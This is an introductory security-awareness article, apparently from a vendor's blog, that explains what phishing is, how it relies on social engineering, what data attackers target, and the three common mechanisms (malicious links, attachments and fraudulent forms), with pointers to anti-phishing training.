Chances are good that at some point you’ve received a suspicious email urging you to click on a link or open an attachment. This email was most likely an example of the cybercrime known as phishing. This article serves as an introduction to phishing: what it means, how it affects individuals and organizations, and how security awareness and training tools can be used to reduce the threat of these attacks.
First, we’ll explore the three primary types of phishing email examples and how social engineering is the common thread with these types of attacks. Then, we’ll move on to what phishing can do, and why cybercriminals invest time and effort in phishing attacks. We’ll also look at what could happen if you were to fall for a phishing scam, either at work or in your personal life.
Finally, we’ll introduce some resources that will help you better understand the impact of phishing, as well as anti-phishing training modules and phishing tests designed to help individuals recognize and avoid attacks.
What is Phishing?
Phishing is when cybercriminals send malicious emails designed to trick people into falling for a scam. The intent is often to get users to reveal financial information, system credentials, or other sensitive data.
The term “phishing” came about in the mid-1990s, when hackers began using fraudulent emails to “fish for” information from unsuspecting users. Since these early hackers were often referred to as “phreaks,” the term became known as “phishing,” with a “ph.” Phishing emails try to lure you in and get you to take the bait. And once you’re hooked, you’re in trouble.
Phishing is an example of social engineering: a collection of techniques scam artists use to manipulate human psychology. Social engineering techniques include forgery, misdirection, and lying, all of which can play a part in phishing attacks. On a basic level, phishing emails use social engineering to encourage you to act without thinking things through.
Why Is Phishing a Problem?
Cybercriminals use phishing because it’s easy, cheap, and effective. Email addresses are easy to obtain, and emails are virtually free to send. With little effort and little cost, attackers can quickly gain access to valuable data. Those who fall for phishing scams may end up with malware infections (including ransomware), identity theft, and data loss.
The data cybercriminals go after includes personal information — like financial account data, credit card numbers, and tax and medical records — as well as sensitive business data, like customer names and contact information, proprietary product secrets, and confidential communications.
Cybercriminals also use phishing attacks to gain direct access to email, social media, and other accounts — or to obtain permissions to modify and compromise connected systems, like point of sale terminals and order processing systems. Many of the biggest data breaches — like the headline-grabbing 2013 Target breach — start with a phishing email. Using a seemingly innocent email, cybercriminals can gain a small foothold and build on it.
Cybercriminals use three primary mechanisms within phishing emails to steal your information: malicious web links, malicious attachments, and fraudulent data-entry forms. For additional examples, check out our Latest in Phishing blog series. You can also subscribe to our blog to receive notifications when new posts are published.